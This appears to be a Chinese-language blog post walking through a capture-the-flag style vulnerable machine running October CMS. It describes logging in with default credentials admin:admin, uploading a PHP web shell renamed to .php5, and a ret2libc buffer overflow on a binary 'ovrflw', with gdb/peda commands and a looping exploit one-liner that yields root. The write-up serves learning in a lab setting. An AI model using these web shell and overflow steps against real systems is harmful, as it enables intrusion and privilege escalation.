搜了一下october
有漏洞
然后默认的后台是/backend
试了一下密码admin:admin
竟然进去了????
有文件上传功能
shel.php
抓包
改成*.php5
右侧click here
拿到权限
dirb也扫出来后台了
但是我都已经不需要了
接下来是缓存区溢出了
正在看
所以就写到这吧
看了一晚上+一个白天
算是明白原理以及利用了
算了,直接贴传送门吧
国外大佬写的靶机教程
很详细
大概就是
1.检查防护
2.查看调用函数
3.通过脚本创造一个字符串(大一点的)
4.找到覆盖EIP的字节
5.通过脚本检查字节所在这个字符串的哪个位置
6.找到地址
7.生成漏洞利用脚本
8.运行得到root权限
安装
1.apt-get install gdb
2.git clone https://github.com/longld/peda.git ~/peda
3.echo "source ~/peda/peda.py" >> ~/.gdbinit
在Kali运行
1.gdb ./ovrflw
2.aslr
3.pdisass main
4.checksec
5.(再打开一个终端)pattern create 150
6.(在gdb运行)r '粘贴生成字符串'
7.(再刚才新打开的终端运行)pattern_offset 0x41384141
然后在靶机上运行
1.gdb /usr/local/bin/ovrflw -q
2.b main
3.run
4.p system
5.find 得到的字符串1, +9999999, “/bin/sh”
6.x/s 得到的字符串2
7.p exit
8.while true; do /usr/local/bin/ovrflw $(python -c 'print "A" * 112+ "\x10\xc3\x59\xb7\x60\xf2\x58\xb7\xac\xeb\x6b\xb7"'); done
对于我现在的知识
解决它还是有点困难
有没有大佬推荐一下缓冲区溢出的学习教程的
奉上双膝